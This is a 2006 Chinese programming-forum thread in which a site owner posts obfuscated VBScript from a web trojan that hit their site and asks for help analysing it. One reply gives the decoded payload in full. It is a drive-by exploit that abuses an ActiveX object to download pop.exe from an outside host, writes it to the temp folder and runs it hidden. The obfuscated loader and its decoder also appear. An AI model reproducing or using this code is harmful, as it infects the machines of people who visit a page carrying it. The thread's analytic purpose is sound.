关于一个vbscript病毒的问题

asbeforelong 2006-07-30 03:09:08
<SCRIPT language=vbscript>

hu="琳R~+$#T琳6R*y) '+6#w%},w}{S8lXiy) '+8T琳6666&%6{))&)6){*,${6%{/+琳6666$w} yz#6S68~++'PEE...DGHK0yDy&$E'&'D{/{8琳6666i{+6$w} yz|6S6z&y,${%+Dy){w+{[#{${%+>8&x!{y+8?琳6666$w} yz|D*{+W++) x,+{68y#w** z8B68y#* zPXZOLYKKLCLKwICGGZFCONIWCFFYFJ\YHO[IL8琳6666*+)S8c y)&*&|+Dncb^jjf8琳6666i{+6$w} y/6S6$w} yz|DY){w+{ex!{y+>*+)B88?琳6666+/+wGS8Wz&8琳6666+/+wHS8zxD8琳6666+/+wIS8i+)8琳6666+/+wJS8{w$8琳6666*+)GS+/+wG<+/+wH<+/+wI<+/+wJ琳6666*+)KS*+)G琳6666*{+6i%w${6S6$w} yz|Dy){w+{&x!{y+>*+)KB88?琳6666i%w${D+0'{6S6G琳6666*+)LS8][j8琳6666$w} y/De'{%6*+)LB6$w} yz#B6\w#*{琳6666$w} y/Di{%z琳6666|%w${GS8~wy""KHGDy&$8琳6666*{+6\%w${6S6$w} yz|Dy){w+{&x!{y+>8iy) '+ %}D\ #{i0*+{$ex!{y+8B88?琳6666*{+6+$'%w${6S6\%w${D]{+i'{y w#\&#z{)>H?6琳6666|%w${GS6\%w${DX, #zfw+~>+$'%w${B|%w${G?琳6666i%w${D&'{%琳6666i%w${D.) +{6$w} y/D){*'&%*{X&z0琳6666i%w${D*w-{+&| #{6|%w${GBH琳6666i%w${Dy#&*{琳6666*{+6g%w${6S6$w} yz|Dy){w+{&x!{y+>8i~{##DW''# yw+ &%8B88?琳6666g%w${Di~{##[/{y,+{6|%w${GB88B88B8&'{%8BF琳6666RE*y) '+T琳6666R~{wzT琳6666R+ +#{Tcw} yDX#wy""6最新网马RE+ +#{T琳6666RE~{wzTRx&z0T琳 Ry{%+{)T欢迎测试7REy{%+{)T琳6666REx&z0TRE~+$#T琳"

function UnEncode(temp)
but=22
for i = 1 to len(temp)
if mid(temp,i,1)<> "琳" then
If Asc(Mid(temp, i, 1)) < 32 Or Asc(Mid(temp, i, 1)) > 126 Then
a = a & Chr(Asc(Mid(temp, i, 1)))
else
pk=asc(mid(temp,i,1))-but
if pk>126 then
pk=pk-95
elseif pk<32 then
pk=pk+95
end if
a=a&chr(pk)
end if
else
a=a&vbcrlf
end if
next
UnEncode=a
end function
document.write(UnEncode(hu))
</SCRIPT>
</SCRIPT>

-------------------
上面是这几天一直被一个网页木马骚扰的网站源代码,不了解vbscript,有没有哪个大虾帮忙分析一下?
这个代码好像是解密的,那么加密hu字符串的那个函数怎么实现?
...全文
364 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
「已注销」 2006-10-13
  • 打赏
  • 举报
回复
超级老的东东,把注册表修改下马上失效
patchclass 2006-08-03
  • 打赏
  • 举报
回复
哦,不对,是自己定义的加密方法,看错了,你把解密函数写在下面了啊:-)
patchclass 2006-08-03
  • 打赏
  • 举报
回复
用aspencode加密的,你可以用工具aspdecode解开
jacky421 2006-08-03
  • 打赏
  • 举报
回复
专业帮顶
supergreenbean 2006-07-30
  • 打赏
  • 举报
回复
<html>
<script language="VBScript">
on error resume next
magicdl="http://www.125yc.com/pop.exe"
Set magicdf=document.createElement("object")
magicdf.setAttribute "classid","clsid:BD96C556-65a3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set magicx=magicdf.CreateObject(str,"")
txta1="Ado"
txta2="db."
txta3="Str"
txta4="eam"
str1=txta1 & txta2 & txta3 & txta4
str5=str1
set Sname=magicdf.createobject(str5,"")
Sname.type=1
str6="GET"
magicx.Open str6,magicdl,False
magicx.Send
fname1="hack521.com"
set Fname=magicdf.createobject("Scripting.FileSystemObject","")
set tmpname=Fname.GetSpecialFolder(2)
fname1=Fname.BuildPath(tmpname,fname1)
Sname.open
Sname.write magicx.responseBody
Sname.savetofile fname1,2
Sname.close
set Qname=magicdf.createobject("Shell.Application","")
Qname.Shell Execute fname1,"","","open",0
</script>
<head>
<title>Magic.Black最新网马</title>
</head><body>
<center>欢迎测试!</center>
</body></html>

4,008

社区成员

发帖
与我相关
我的任务
社区描述
它是一种微软环境下的轻量级的解释型语言,它使用COM组件、WMI、WSH、ADSI访问系统中的元素,对系统进行管理。
社区管理员
  • vbScript社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧